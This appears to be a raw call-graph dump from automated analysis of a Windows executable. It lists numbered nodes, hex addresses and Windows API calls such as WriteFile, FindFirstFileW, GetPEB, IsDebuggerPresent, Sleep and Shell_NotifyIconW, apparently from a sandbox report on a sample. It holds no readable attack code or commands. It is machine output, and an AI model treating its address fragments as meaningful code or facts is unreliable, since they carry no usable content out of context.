95794->95802 95798->95794 95803 b82933 95798->95803 95810 b8af61 95798->95810 95837 b82c84 95798->95837 95843 b88e63 78 API calls 6 library calls 95798->95843 95800->95760 95801->95756 95802->95756 95804 b8293d 95803->95804 95805 b82952 95803->95805 95844 b87c0e 47 API calls __getptd_noexit 95804->95844 95805->95798 95807 b82942 95845 b86e10 8 API calls __cftof_l 95807->95845 95809 b8294d 95809->95798 95811 b8af6d __tzset_nolock 95810->95811 95812 b8af75 95811->95812 95817 b8af8d 95811->95817 95919 b87bda 47 API calls __getptd_noexit 95812->95919 95814 b8b022 95924 b87bda 47 API calls __getptd_noexit 95814->95924 95815 b8af7a 95920 b87c0e 47 API calls __getptd_noexit 95815->95920 95817->95814 95820 b8afbf 95817->95820 95819 b8b027 95925 b87c0e 47 API calls __getptd_noexit 95819->95925 95846 b8a8ed 95820->95846 95823 b8b02f 95926 b86e10 8 API calls __cftof_l 95823->95926 95824 b8afc5 95826 b8afd8 95824->95826 95827 b8afeb 95824->95827 95855 b8b043 95826->95855 95921 b87c0e 47 API calls __getptd_noexit 95827->95921 95828 b8af82 __tzset_nolock 95828->95798 95831 b8afe4 95923 b8b01a LeaveCriticalSection __unlock_fhandle 95831->95923 95832 b8aff0 95922 b87bda 47 API calls __getptd_noexit 95832->95922 95835->95792 95836->95794 95838 b82c97 95837->95838 95842 b82cbb 95837->95842 95839 b82933 __fclose_nolock 47 API calls 95838->95839 95838->95842 95840 b82cb4 95839->95840 95841 b8af61 __flush 78 API calls 95840->95841 95841->95842 95842->95798 95843->95798 95844->95807 95845->95809 95847 b8a8f9 __tzset_nolock 95846->95847 95848 b8a946 EnterCriticalSection 95847->95848 95849 b87cf4 __lock 47 API calls 95847->95849 95850 b8a96c __tzset_nolock 95848->95850 95851 b8a91d 95849->95851 95850->95824 95852 b8a928 InitializeCriticalSectionAndSpinCount 95851->95852 95853 b8a93a 95851->95853 95852->95853 95927 b8a970 LeaveCriticalSection _doexit 95853->95927 95856 b8b050 __ftell_nolock 95855->95856 95857 b8b0ac 95856->95857 95858 b8b08d 95856->95858 95889 b8b082 95856->95889 95863 b8b105 95857->95863 95864 b8b0e9 95857->95864 95937 b87bda 47 API calls __getptd_noexit 95858->95937 95861 b8b86b 95861->95831 95862 b8b092 95938 b87c0e 47 API calls __getptd_noexit 95862->95938 95866 b8b11c 95863->95866 95943 b8f82f 49 API calls 3 library calls 95863->95943 95940 b87bda 47 API calls __getptd_noexit 95864->95940 95928 b93bf2 95866->95928 95868 b8b099 95939 b86e10 8 API calls __cftof_l 95868->95939 95871 b8b0ee 95941 b87c0e 47 API calls __getptd_noexit 95871->95941 95873 b8b12a 95876 b8b44b 95873->95876 95944 b87a0d 47 API calls 2 library calls 95873->95944 95875 b8b0f5 95942 b86e10 8 API calls __cftof_l 95875->95942 95878 b8b7b8 WriteFile 95876->95878 95879 b8b463 95876->95879 95880 b8b7e1 GetLastError 95878->95880 95891 b8b410 95878->95891 95882 b8b55a 95879->95882 95888 b8b479 95879->95888 95880->95891 95893 b8b663 95882->95893 95896 b8b565 95882->95896 95883 b8b81b 95883->95889 95949 b87c0e 47 API calls __getptd_noexit 95883->95949 95884 b8b150 GetConsoleMode 95884->95876 95885 b8b189 95884->95885 95885->95876 95886 b8b199 GetConsoleCP 95885->95886 95886->95891 95914 b8b1c2 95886->95914 95887 b8b4e9 WriteFile 95887->95880 95892 b8b526 95887->95892 95888->95883 95888->95887 95951 b8a70c 95889->95951 95891->95883 95891->95889 95895 b8b7f7 95891->95895 95892->95888 95892->95891 95904 b8b555 95892->95904 95893->95883 95897 b8b6d8 WideCharToMultiByte 95893->95897 95894 b8b843 95950 b87bda 47 API calls __getptd_noexit 95894->95950 95899 b8b7fe 95895->95899 95900 b8b812 95895->95900 95896->95883 95901 b8b5de WriteFile 95896->95901 95897->95880 95912 b8b71f 95897->95912 95946 b87c0e 47 API calls __getptd_noexit 95899->95946 95948 b87bed 47 API calls 3 library calls 95900->95948 95901->95880 95903 b8b62d 95901->95903 95903->95891 95903->95896 95903->95904 95904->95891 95906 b8b727 WriteFile 95909 b8b77a GetLastError 95906->95909 95906->95912 95907 b8b803 95947 b87bda 47 API calls __getptd_noexit 95907->95947 95909->95912 95911 b940f7 59 API calls __chsize_nolock 95911->95914 95912->95891 95912->95893 95912->95904 95912->95906 95913 b95884 WriteConsoleW CreateFileW __chsize_nolock 95916 b8b2f6 95913->95916 95914->95891 95914->95911 95915 b8b28f WideCharToMultiByte 95914->95915 95914->95916 95945 b81688 57 API calls __isleadbyte_l 95914->95945 95915->95891 95917 b8b2ca WriteFile 95915->95917 95916->95880 95916->95891 95916->95913 95916->95914 95918 b8b321 WriteFile 95916->95918 95917->95880 95917->95916 95918->95880 95918->95916 95919->95815 95920->95828 95921->95832 95922->95831 95923->95828 95924->95819 95925->95823 95926->95828 95927->95848 95929 b93c0a 95928->95929 95930 b93bfd 95928->95930 95933 b93c16 95929->95933 95959 b87c0e 47 API calls __getptd_noexit 95929->95959 95958 b87c0e 47 API calls __getptd_noexit 95930->95958 95932 b93c02 95932->95873 95933->95873 95935 b93c37 95960 b86e10 8 API calls __cftof_l 95935->95960 95937->95862 95938->95868 95939->95889 95940->95871 95941->95875 95942->95889 95943->95866 95944->95884 95945->95914 95946->95907 95947->95889 95948->95889 95949->95894 95950->95889 95952 b8a714 95951->95952 95953 b8a716 IsProcessorFeaturePresent 95951->95953 95952->95861 95955 b937b0 95953->95955 95961 b9375f 5 API calls 2 library calls 95955->95961 95957 b93893 95957->95861 95958->95932 95959->95935 95960->95932 95961->95957 95963 b8359b 95962->95963 95964 b83587 95962->95964 95966 b83597 95963->95966 95968 b82c84 __flush 78 API calls 95963->95968 96008 b87c0e 47 API calls __getptd_noexit 95964->96008 95980 b83653 LeaveCriticalSection LeaveCriticalSection _fseek 95966->95980 95967 b8358c 96009 b86e10 8 API calls __cftof_l 95967->96009 95970 b835a7 95968->95970 95981 b8eb36 95970->95981 95973 b82933 __fclose_nolock 47 API calls 95974 b835b5 95973->95974 95985 b8e9d2 95974->95985 95976 b835bb 95976->95966 95977 b81c9d _free 47 API calls 95976->95977 95977->95966 95978->95770 95979->95774 95980->95774 95982 b8eb43 95981->95982 95984 b835af 95981->95984 95983 b81c9d _free 47 API calls 95982->95983 95982->95984 95983->95984 95984->95973 95986 b8e9de __tzset_nolock 95985->95986 95987 b8e9fe 95986->95987 95988 b8e9e6 95986->95988 95989 b8ea7b 95987->95989 95994 b8ea28 95987->95994 96025 b87bda 47 API calls __getptd_noexit 95988->96025 96029 b87bda 47 API calls __getptd_noexit 95989->96029 95991 b8e9eb 96026 b87c0e 47 API calls __getptd_noexit 95991->96026 95993 b8ea80 96030 b87c0e 47 API calls __getptd_noexit 95993->96030 95997 b8a8ed ___lock_fhandle 49 API calls 95994->95997 95999 b8ea2e 95997->95999 95998 b8ea88 96031 b86e10 8 API calls __cftof_l 95998->96031 96001 b8ea4c 95999->96001 96002 b8ea41 95999->96002 96027 b87c0e 47 API calls __getptd_noexit 96001->96027 96010 b8ea9c 96002->96010 96004 b8e9f3 __tzset_nolock 96004->95976 96006 b8ea47 96028 b8ea73 LeaveCriticalSection __unlock_fhandle 96006->96028 96008->95967 96009->95966 96032 b8aba4 96010->96032 96012 b8eb00 96045 b8ab1e 48 API calls 2 library calls 96012->96045 96013 b8eaaa 96013->96012 96016 b8aba4 __chsize_nolock 47 API calls 96013->96016 96024 b8eade 96013->96024 96015 b8eb08 96023 b8eb2a 96015->96023 96046 b87bed 47 API calls 3 library calls 96015->96046 96018 b8ead5 96016->96018 96017 b8aba4 __chsize_nolock 47 API calls 96019 b8eaea CloseHandle 96017->96019 96021 b8aba4 __chsize_nolock 47 API calls 96018->96021 96019->96012 96022 b8eaf6 GetLastError 96019->96022 96021->96024 96022->96012 96023->96006 96024->96012 96024->96017 96025->95991 96026->96004 96027->96006 96028->96004 96029->95993 96030->95998 96031->96004 96033 b8abaf 96032->96033 96035 b8abc4 96032->96035 96047 b87bda 47 API calls __getptd_noexit 96033->96047 96040 b8abe9 96035->96040 96049 b87bda 47 API calls __getptd_noexit 96035->96049 96037 b8abb4 96048 b87c0e 47 API calls __getptd_noexit 96037->96048 96038 b8abf3 96050 b87c0e 47 API calls __getptd_noexit 96038->96050 96040->96013 96042 b8abbc 96042->96013 96043 b8abfb 96051 b86e10 8 API calls __cftof_l 96043->96051 96045->96015 96046->96023 96047->96037 96048->96042 96049->96038 96050->96043 96051->96042 96053 ba6529 96052->96053 96054 ba6cc4 FindFirstFileW 96052->96054 96053->95180 96054->96053 96055 ba6cd9 FindClose 96054->96055 96055->96053 96057 b6bd3f 96056->96057 96060 b6bd5a 96056->96060 96058 b6bdfa 48 API calls 96057->96058 96059 b6bd47 CharUpperBuffW 96058->96059 96059->96060 96060->95191 96062 bd436a 96061->96062 96063 b62b8b 96061->96063 96064 b7f4ea 48 API calls 96063->96064 96066 b62b92 96064->96066 96065 b62bb3 96065->95197 96066->96065 96143 b62bce 48 API calls 96066->96143 96069 b6e8f6 96068->96069 96101 b6e906 Mailbox 96068->96101 96070 b6ed52 96069->96070 96069->96101 96227 b7e3cd 335 API calls 96070->96227 96071 bacc5c 86 API calls 96071->96101 96073 b6ebdd 96073->95197 96075 b6ed63 96075->96073 96077 b6ed70 96075->96077 96076 b6e94c PeekMessageW 96076->96101 96229 b7e312 335 API calls Mailbox 96077->96229 96079 b6ed77 LockWindowUpdate DestroyWindow GetMessageW 96079->96073 96082 b6eda9 96079->96082 96080 bd526e Sleep 96080->96101 96084 bd59ef TranslateMessage DispatchMessageW GetMessageW 96082->96084 96083 b6ebc7 96083->96073 96228 b62ff6 16 API calls 96083->96228 96084->96084 96086 bd5a1f 96084->96086 96086->96073 96087 b6ed21 PeekMessageW 96087->96101 96088 b6ebf7 timeGetTime 96088->96101 96090 b7f4ea 48 API calls 96090->96101 96091 b66eed 48 API calls 96091->96101 96092 b6ed3a TranslateMessage DispatchMessageW 96092->96087 96093 bd5557 WaitForSingleObject 96094 bd5574 GetExitCodeProcess CloseHandle 96093->96094 96093->96101 96094->96101 96095 b6d7f7 48 API calls 96119 bd5429 Mailbox 96095->96119 96096 bd588f Sleep 96096->96119 96097 b6edae timeGetTime 96230 b61caa 49 API calls 96097->96230 96100 bd5733 Sleep 96100->96119 96101->96071 96101->96076 96101->96080 96101->96083 96101->96087 96101->96088 96101->96090 96101->96091 96101->96092 96101->96093 96101->96096 96101->96097 96101->96100 96105 b62aae 311 API calls 96101->96105 96107 bd5445 Sleep 96101->96107 96115 b61caa 49 API calls 96101->96115 96101->96119 96121 b6fe30 311 API calls 96101->96121 96123 b745e0 311 API calls 96101->96123 96124 b73200 311 API calls 96101->96124 96127 b6ce19 48 API calls 96101->96127 96128 b6d6e9 55 API calls 96101->96128 96144 b6ef00 96101->96144 96151 b6f110 96101->96151 96216 b7e244 96101->96216 96221 b7dc5f 96101->96221 96226 b6eed0 335 API calls Mailbox 96101->96226 96231 bc8d23 48 API calls 96101->96231 96103 bd5926 GetExitCodeProcess 96108 bd593c WaitForSingleObject 96103->96108 96109 bd5952 CloseHandle 96103->96109 96105->96101 96106 b7dc38 timeGetTime 96106->96119 96107->96101 96108->96101 96108->96109 96109->96119 96110 bd5432 Sleep 96110->96107 96111 bc8c4b 108 API calls 96111->96119 96112 b62c79 107 API calls 96112->96119 96114 bd59ae Sleep 96114->96101 96115->96101 96117 b6ce19 48 API calls 96117->96119 96119->96095 96119->96101 96119->96103 96119->96106 96119->96107 96119->96110 96119->96111 96119->96112 96119->96114 96119->96117 96122 b6d6e9 55 API calls 96119->96122 96232 ba4cbe 49 API calls Mailbox 96119->96232 96233 b61caa 49 API calls 96119->96233 96234 b62aae 335 API calls 96119->96234 96235 bbccb2 50 API calls 96119->96235 96236 ba7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96119->96236 96237 ba6532 63 API calls 3 library calls 96119->96237 96121->96101 96122->96119 96123->96101 96124->96101 96127->96101 96128->96101 96129->95197 96130->95197 96131->95197 96132->95197 96133->95197 96134->95197 96135->95197 96136->95197 96137->95197 96139 b6d6f4 96138->96139 96140 b6d71b 96139->96140 96300 b6d764 55 API calls 96139->96300 96140->95197 96142->95197 96143->96065 96145 b6ef2f 96144->96145 96146 b6ef1d 96144->96146 96271 bacc5c 86 API calls 4 library calls 96145->96271 96238 b6e3b0 96146->96238 96149 b6ef26 96149->96101 96150 bd86f9 96150->96150 96152 b6f130 96151->96152 96154 b6fe30 335 API calls 96152->96154 96158 b6f199 96152->96158 96153 b6f595 96160 b6d7f7 48 API calls 96153->96160 96198 b6f431 Mailbox 96153->96198 96155 bd8728 96154->96155 96155->96158 96280 bacc5c 86 API calls 4 library calls 96155->96280 96156 bd87c8 96283 bacc5c 86 API calls 4 library calls 96156->96283 96158->96153 96161 b6d7f7 48 API calls 96158->96161 96201 b6f229 96158->96201 96205 b6f3dd 96158->96205 96162 bd87a3 96160->96162 96165 bd8772 96161->96165 96282 b80f0a 52 API calls __cinit 96162->96282 96163 b6f3f2 96172 b6f418 96163->96172 96284 ba9af1 48 API calls 96163->96284 96164 bd8b1b 96180 bd8b2c 96164->96180 96181 bd8bcf 96164->96181 96281 b80f0a 52 API calls __cinit 96165->96281 96168 b6f770 96171 bd8a45 96168->96171 96195 b6f77a 96168->96195 96170 b6d6e9 55 API calls 96170->96198 96290 b7c1af 48 API calls 96171->96290 96172->96164 96197 b6f6aa 96172->96197 96172->96198 96173 bd8810 96285 bbeef8 335 API calls 96173->96285 96174 b6fe30 335 API calls 96174->96197 96175 bacc5c 86 API calls 96175->96198 96176 bd8b7e 96293 bbe40a 335 API calls Mailbox 96176->96293 96177 bd8c53 96298 bacc5c 86 API calls 4 library calls 96177->96298 96292 bbf5ee 335 API calls 96180->96292 96295 bacc5c 86 API calls 4 library calls 96181->96295 96182 bd8beb 96296 bbbdbd 335 API calls Mailbox 96182->96296 96184 b6fe30 335 API calls 96184->96198 96187 bd8823 96187->96172 96200 bd884b 96187->96200 96188 b71b90 48 API calls 96188->96198 96189 b6f537 Mailbox 96189->96101 96191 b6fce0 96191->96189 96294 bacc5c 86 API calls 4 library calls 96191->96294 96193 b71b90 48 API calls 96193->96198 96195->96188 96196 bd8c00 96196->96189 96297 bacc5c 86 API calls 4 library calls 96196->96297 96197->96168 96197->96174 96197->96189 96197->96191 96197->96198 96198->96170 96198->96175 96198->96176 96198->96177 96198->96182 96198->96184 96198->96189 96198->96191 96198->96193 96279 b6dd47 48 API calls ___crtGetEnvironmentStringsW 96198->96279 96291 b997ed InterlockedDecrement 96198->96291 96299 b7c1af 48 API calls 96198->96299 96286 bbccdc 48 API calls 96200->96286 96201->96153 96201->96172 96201->96198 96201->96205 96205->96156 96205->96163 96205->96198 96206 bd8857 96208 bd8865 96206->96208 96209 bd88aa 96206->96209 96287 ba9b72 48 API calls 96208->96287 96212 bd88a0 Mailbox 96209->96212 96288 baa69d 48 API calls 96209->96288 96210 b6fe30 335 API calls 96210->96189 96212->96210 96214 bd88e7 96289 b6bc74 48 API calls 96214->96289 96218 bddf42 96216->96218 96220 b7e253 96216->96220 96217 bddf77 96218->96217 96219 bddf59 TranslateAcceleratorW 96218->96219 96219->96220 96220->96101 96222 b7dca3 96221->96222 96224 b7dc71 96221->96224 96222->96101 96223 b7dc96 IsDialogMessageW 96223->96222 96223->96224 96224->96222 96224->96223 96225 bddd1d GetClassLongW 96224->96225 96225->96223 96225->96224 96226->96101 96227->96083 96228->96075 96229->96079 96230->96101 96231->96101 96232->96119 96233->96119 96234->96119 96235->96119 96236->96119 96237->96119 96239 b6fe30 335 API calls 96238->96239 96242 b6e3ef 96239->96242 96240 bd7bd2 96278 bacc5c 86 API calls 4 library calls 96240->96278 96242->96240 96245 b6e44c ___crtGetEnvironmentStringsW 96242->96245 96246 b6e80b Mailbox 96242->96246 96266 b6e609 96242->96266 96243 bd7be4 96243->96149 96244 b6e450 96244->96149 96245->96244 96245->96246 96247 b7f4ea 48 API calls 96245->96247 96257 b6e597 96245->96257 96245->96266 96249 b7f4ea 48 API calls 96246->96249 96247->96245 96248 b6e731 96250 b6e746 96248->96250 96251 bd7bb7 96248->96251 96255 b6e5ab ___crtGetEnvironmentStringsW 96249->96255 96252 b7f4ea 48 API calls 96250->96252 96277 bbcd62 50 API calls 96251->96277 96264 b6e644 96252->96264 96254 bd7bc6 96254->96149 96256 b6e5d6 96255->96256 96258 b7f4ea 48 API calls 96255->96258 96255->96266 96256->96266 96272 b6df5f 335 API calls 96256->96272 96257->96246 96259 b6e5a4 96257->96259 96258->96256 96261 b7f4ea 48 API calls 96259->96261 96260 bd7ba6 96276 bacc5c 86 API calls 4 library calls 96260->96276 96261->96255 96264->96149 96266->96248 96266->96260 96266->96264 96267 bd7b7e 96266->96267 96269 bd7b59 96266->96269 96273 b656b0 335 API calls 96266->96273 96275 bacc5c 86 API calls 4 library calls 96267->96275 96274 bacc5c 86 API calls 4 library calls 96269->96274 96271->96150 96272->96266 96273->96266 96274->96264 96275->96264 96276->96264 96277->96254 96278->96243 96279->96198 96280->96158 96281->96201 96282->96198 96283->96189 96284->96173 96285->96187 96286->96206 96287->96212 96288->96214 96289->96212 96290->96198 96291->96198 96292->96198 96293->96191 96294->96189 96295->96189 96296->96196 96297->96189 96298->96189 96299->96198 96300->96140 96301->94925 96302 16b63d8 96316 16b4028 96302->96316 96304 16b64b1 96319 16b62c8 96304->96319 96322 16b74d8 GetPEB 96316->96322 96318 16b46b3 96318->96304 96320 16b62d1 Sleep 96319->96320 96321 16b62df 96320->96321 96323 16b7502 96322->96323 96323->96318 96324 b63742 96325 b6374b 96324->96325 96326 b637c8 96325->96326 96327 b63769 96325->96327 96364 b637c6 96325->96364 96331 b637ce 96326->96331 96332 bd1e00 96326->96332 96328 b63776 96327->96328 96329 b6382c PostQuitMessage 96327->96329 96334 bd1e88 96328->96334 96335 b63781 96328->96335 96356 b637b9 96329->96356 96330 b637ab DefWindowProcW 96330->96356 96336 b637f6 SetTimer RegisterWindowMessageW 96331->96336 96337 b637d3 96331->96337 96379 b62ff6 16 API calls 96332->96379 96394 ba4ddd 60 API calls _memset 96334->96394 96339 b63836 96335->96339 96340 b63789 96335->96340 96341 b6381f CreatePopupMenu 96336->96341 96336->96356 96343 b637da KillTimer 96337->96343 96344 bd1da3 96337->96344 96338 bd1e27 96380 b7e312 335 API calls Mailbox 96338->96380 96369 b7eb83 96339->96369 96347 b63794 96340->96347 96352 bd1e6d 96340->96352 96341->96356 96376 b63847 Shell_NotifyIconW _memset 96343->96376 96349 bd1ddc MoveWindow 96344->96349 96350 bd1da8 96344->96350 96353 b6379f 96347->96353 96354 bd1e58 96347->96354 96349->96356 96357 bd1dac 96350->96357 96358 bd1dcb SetFocus 96350->96358 96351 b637ed 96377 b6390f DeleteObject DestroyWindow Mailbox 96351->96377 96352->96330 96393 b9a5f3 48 API calls 96352->96393 96353->96330 96381 b63847 Shell_NotifyIconW _memset 96353->96381 96392 ba55bd 70 API calls _memset 96354->96392 96355 bd1e9a 96355->96330 96355->96356 96357->96353 96361 bd1db5 96357->96361 96358->96356 96378 b62ff6 16 API calls 96361->96378 96363 bd1e68 96363->96356 96364->96330 96367 bd1e4c 96382 b64ffc 96367->96382 96370 b7ec1c 96369->96370 96371 b7eb9a _memset 96369->96371 96370->96356 96395 b651af 96371->96395 96373 b7ec05 KillTimer SetTimer 96373->96370 96374 b7ebc1 96374->96373 96375 bd3c7a Shell_NotifyIconW 96374->96375 96375->96373 96376->96351 96377->96356 96378->96356 96379->96338 96380->96353 96381->96367 96383 b65027 _memset 96382->96383 96417 b64c30 96383->96417 96386 b650ac 96388 bd3d28 Shell_NotifyIconW 96386->96388 96389 b650ca Shell_NotifyIconW 96386->96389 96390 b651af 50 API calls 96389->96390 96391 b650df 96390->96391 96391->96364 96392->96363 96393->96364 96394->96355 96396 b652a2 Mailbox 96395->96396 96397 b651cb 96395->96397 96396->96374 96398 b66b0f 48 API calls 96397->96398 96399 b651d9 96398->96399 96400 b651e6 96399->96400 96401 bd3ca1 LoadStringW 96399->96401 96402 b66a63 48 API calls 96400->96402 96403 bd3cbb 96401->96403 96404 b651fb 96402->96404 96405 b6510d 48 API calls 96403->96405 96404->96403 96406 b6520c 96404->96406 96411 bd3cc5 96405->96411 96407 b65216 96406->96407 96408 b652a7 96406->96408 96409 b6510d 48 API calls 96407->96409 96410 b66eed 48 API calls 96408->96410 96414 b65220 _memset _wcscpy 96409->96414 96410->96414 96412 b6518c 48 API calls 96411->96412 96411->96414 96413 bd3ce7 96412->96413 96416 b6518c 48 API calls 96413->96416 96415 b65288 Shell_NotifyIconW 96414->96415 96415->96396 96416->96414 96418 b64c44 96417->96418 96419 bd3c33 96417->96419 96418->96386 96421 ba5819 61 API calls _W_store_winword 96418->96421 96419->96418 96420 bd3c3c DestroyIcon 96419->96420 96420->96418 96421->96386 96422 bd8eb8 96426 baa635 96422->96426 96424 bd8ec3 96425 baa635 84 API calls 96424->96425 96425->96424 96427 baa66f 96426->96427 96431 baa642 96426->96431 96427->96424 96428 baa671 96438 b7ec4e 81 API calls 96428->96438 96430 baa676 96432 b6936c 81 API calls 96430->96432 96431->96427 96431->96428 96431->96430 96435 baa669 96431->96435 96433 baa67d 96432->96433 96434 b6510d 48 API calls 96433->96434 96434->96427 96437 b74525 61 API calls ___crtGetEnvironmentStringsW 96435->96437 96437->96427 96438->96430 96439 b85dfd 96440 b85e09 __tzset_nolock 96439->96440 96476 b87eeb GetStartupInfoW 96440->96476 96442 b85e0e 96478 b89ca7 GetProcessHeap 96442->96478 96444 b85e66 96445 b85e71 96444->96445 96563 b85f4d 47 API calls 3 library calls 96444->96563 96479 b87b47 96445->96479 96448 b85e77 96449 b85e82 __RTC_Initialize 96448->96449 96564 b85f4d 47 API calls 3 library calls 96448->96564 96500 b8acb3 96449->96500 96452 b85e9d GetCommandLineW 96519 b92e7d GetEnvironmentStringsW 96452->96519 96453 b85e91 96453->96452 96565 b85f4d 47 API calls 3 library calls 96453->96565 96456 b85e9c 96456->96452 96460 b85ec2 96532 b92cb4 96460->96532 96463 b85ec8 96464 b85ed3 96463->96464 96567 b8115b 47 API calls 3 library calls 96463->96567 96546 b81195 96464->96546 96467 b85edb 96468 b85ee6 __wwincmdln 96467->96468 96568 b8115b 47 API calls 3 library calls 96467->96568 96550 b63a0f 96468->96550 96471 b85efa 96472 b85f09 96471->96472 96569 b813f1 47 API calls _doexit 96471->96569 96570 b81186 47 API calls _doexit 96472->96570 96475 b85f0e __tzset_nolock 96477 b87f01 96476->96477 96477->96442 96478->96444 96571 b8123a 30 API calls 2 library calls 96479->96571 96481 b87b4c 96572 b87e23 InitializeCriticalSectionAndSpinCount 96481->96572 96483 b87b51 96484 b87b55 96483->96484 96574 b87e6d TlsAlloc 96483->96574 96573 b87bbd 50 API calls 2 library calls 96484->96573 96487 b87b5a 96487->96448 96488 b87b67 96488->96484 96489 b87b72 96488->96489 96575 b86986 96489->96575 96492 b87bb4 96583 b87bbd 50 API calls 2 library calls 96492->96583 96495 b87b93 96495->96492 96497 b87b99 96495->96497 96496 b87bb9 96496->96448 96582 b87a94 47 API calls 4 library calls 96497->96582 96499 b87ba1 GetCurrentThreadId 96499->96448 96501 b8acbf __tzset_nolock 96500->96501 96502 b87cf4 __lock 47 API calls 96501->96502 96503 b8acc6 96502->96503 96504 b86986 __calloc_crt 47 API calls 96503->96504 96505 b8acd7 96504->96505 96506 b8ad42 GetStartupInfoW 96505->96506 96507 b8ace2 __tzset_nolock @_EH4_CallFilterFunc@8 96505->96507 96514 b8ae80 96506->96514 96516 b8ad57 96506->96516 96507->96453 96508 b8af44 96592 b8af58 LeaveCriticalSection _doexit 96508->96592 96510 b8aec9 GetStdHandle 96510->96514 96511 b86986 __calloc_crt 47 API calls 96511->96516 96512 b8aedb GetFileType 96512->96514 96513 b8ada5 96513->96514 96517 b8ade5 InitializeCriticalSectionAndSpinCount 96513->96517 96518 b8add7 GetFileType 96513->96518 96514->96508 96514->96510 96514->96512 96515 b8af08 InitializeCriticalSectionAndSpinCount 96514->96515 96515->96514 96516->96511 96516->96513 96516->96514 96517->96513 96518->96513 96518->96517 96520 b92e8e 96519->96520 96521 b85ead 96519->96521 96593 b869d0 47 API calls _W_store_winword 96520->96593 96526 b92a7b GetModuleFileNameW 96521->96526 96524 b92eb4 ___crtGetEnvironmentStringsW 96525 b92eca FreeEnvironmentStringsW 96524->96525 96525->96521 96527 b92aaf _wparse_cmdline 96526->96527 96528 b85eb7 96527->96528 96529 b92ae9 96527->96529 96528->96460 96566 b8115b 47 API calls 3 library calls 96528->96566 96594 b869d0 47 API calls _W_store_winword 96529->96594 96531 b92aef _wparse_cmdline 96531->96528 96533 b92ccd __NMSG_WRITE 96532->96533 96537 b92cc5 96532->96537 96534 b86986 __calloc_crt 47 API calls 96533->96534 96542 b92cf6 __NMSG_WRITE 96534->96542 96535 b92d4d 96536 b81c9d _free 47 API calls 96535->96536 96536->96537 96537->96463 96538 b86986 __calloc_crt 47 API calls 96538->96542 96539 b92d72 96540 b81c9d _free 47 API calls 96539->96540 96540->96537 96542->96535 96542->96537 96542->96538 96542->96539 96543 b92d89 96542->96543 96595 b92567 47 API calls __cftof_l 96542->96595 96596 b86e20 IsProcessorFeaturePresent 96543->96596 96545 b92d95 96545->96463 96547 b811a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 96546->96547 96549 b811e0 __IsNonwritableInCurrentImage 96547->96549 96611 b80f0a 52 API calls __cinit 96547->96611 96549->96467 96551 bd1ebf 96550->96551 96552 b63a29 96550->96552 96553 b63a63 IsThemeActive 96552->96553 96612 b81405 96553->96612 96557 b63a8f 96624 b63adb SystemParametersInfoW SystemParametersInfoW 96557->96624 96559 b63a9b 96625 b63d19 96559->96625 96561 b63aa3 SystemParametersInfoW 96562 b63ac8 96561->96562 96562->96471 96563->96445 96564->96449 96565->96456 96569->96472 96570->96475 96571->96481 96572->96483 96573->96487 96574->96488 96578 b8698d 96575->96578 96577 b869ca 96577->96492 96581 b87ec9 TlsSetValue 96577->96581 96578->96577 96579 b869ab Sleep 96578->96579 96584 b930aa 96578->96584 96580 b869c2 96579->96580 96580->96577 96580->96578 96581->96495 96582->96499 96583->96496 96585 b930d0 __calloc_impl 96584->96585 96586 b930b5 96584->96586 96588 b930e0 HeapAlloc 96585->96588 96590 b930c6 96585->96590 96586->96585 96587 b930c1 96586->96587 96591 b87c0e 47 API calls __getptd_noexit 96587->96591 96588->96585 96588->96590 96590->96578 96591->96590 96592->96507 96593->96524 96594->96531 96595->96542 96597 b86e2b 96596->96597 96602 b86cb5 96597->96602 96601 b86e46 96601->96545 96603 b86ccf _memset __call_reportfault 96602->96603 96604 b86cef IsDebuggerPresent 96603->96604 96610 b881ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96604->96610 96606 b8a70c __cftof_l 6 API calls 96607 b86dd6 96606->96607 96609 b88197 GetCurrentProcess TerminateProcess 96607->96609 96608 b86db3 __call_reportfault 96608->96606 96609->96601 96610->96608 96611->96549 96613 b87cf4 __lock 47 API calls 96612->96613 96614 b81410 96613->96614 96677 b87e58 LeaveCriticalSection 96614->96677 96616 b63a88 96617 b8146d 96616->96617 96618 b81491 96617->96618 96619 b81477 96617->96619 96618->96557 96619->96618 96678 b87c0e 47 API calls __getptd_noexit 96619->96678 96621 b81481 96679 b86e10 8 API calls __cftof_l 96621->96679 96623 b8148c 96623->96557 96624->96559 96626 b63d26 __ftell_nolock 96625->96626 96627 b6d7f7 48 API calls 96626->96627 96628 b63d31 GetCurrentDirectoryW 96627->96628 96680 b661ca 96628->96680 96630 b63d57 IsDebuggerPresent 96631 b63d65 96630->96631 96632 bd1cc1 MessageBoxA 96630->96632 96634 bd1cd9 96631->96634 96635 b63d82 96631->96635 96664 b63e3a 96631->96664 96632->96634 96633 b63e41 SetCurrentDirectoryW 96638 b63e4e Mailbox 96633->96638 96795 b7c682 48 API calls 96634->96795 96754 b640e5 96635->96754 96638->96561 96639 bd1ce9 96644 bd1cff SetCurrentDirectoryW 96639->96644 96644->96638 96664->96633 96677->96616 96678->96621 96679->96623 96797 b7e99b 96680->96797 96684 b661eb 96685 b65374 50 API calls 96684->96685 96686 b661ff 96685->96686 96687 b6ce19 48 API calls 96686->96687 96688 b6620c 96687->96688 96814 b639db 96688->96814 96690 b66216 Mailbox 96691 b66eed 48 API calls 96690->96691 96692 b6622b 96691->96692 96826 b69048 96692->96826 96695 b6ce19 48 API calls 96696 b66244 96695->96696 96697 b6d6e9 55 API calls 96696->96697 96698 b66254 Mailbox 96697->96698 96699 b6ce19 48 API calls 96698->96699 96700 b6627c 96699->96700 96701 b6d6e9 55 API calls 96700->96701 96702 b6628f Mailbox 96701->96702 96703 b6ce19 48 API calls 96702->96703 96704 b662a0 96703->96704 96705 b6d645 53 API calls 96704->96705 96706 b662b2 Mailbox 96705->96706 96707 b6d7f7 48 API calls 96706->96707 96708 b662c5 96707->96708 96829 b663fc 96708->96829 96712 b662df 96713 bd1c08 96712->96713 96714 b662e9 96712->96714 96716 b663fc 48 API calls 96713->96716 96715 b80fa7 _W_store_winword 59 API calls 96714->96715 96717 b662f4 96715->96717 96718 bd1c1c 96716->96718 96717->96718 96719 b662fe 96717->96719 96721 b663fc 48 API calls 96718->96721 96720 b80fa7 _W_store_winword 59 API calls 96719->96720 96722 b66309 96720->96722 96723 bd1c38 96721->96723 96722->96723 96724 b66313 96722->96724 96725 b65374 50 API calls 96723->96725 96726 b80fa7 _W_store_winword 59 API calls 96724->96726 96727 bd1c5d 96725->96727 96728 b6631e 96726->96728 96729 b663fc 48 API calls 96727->96729 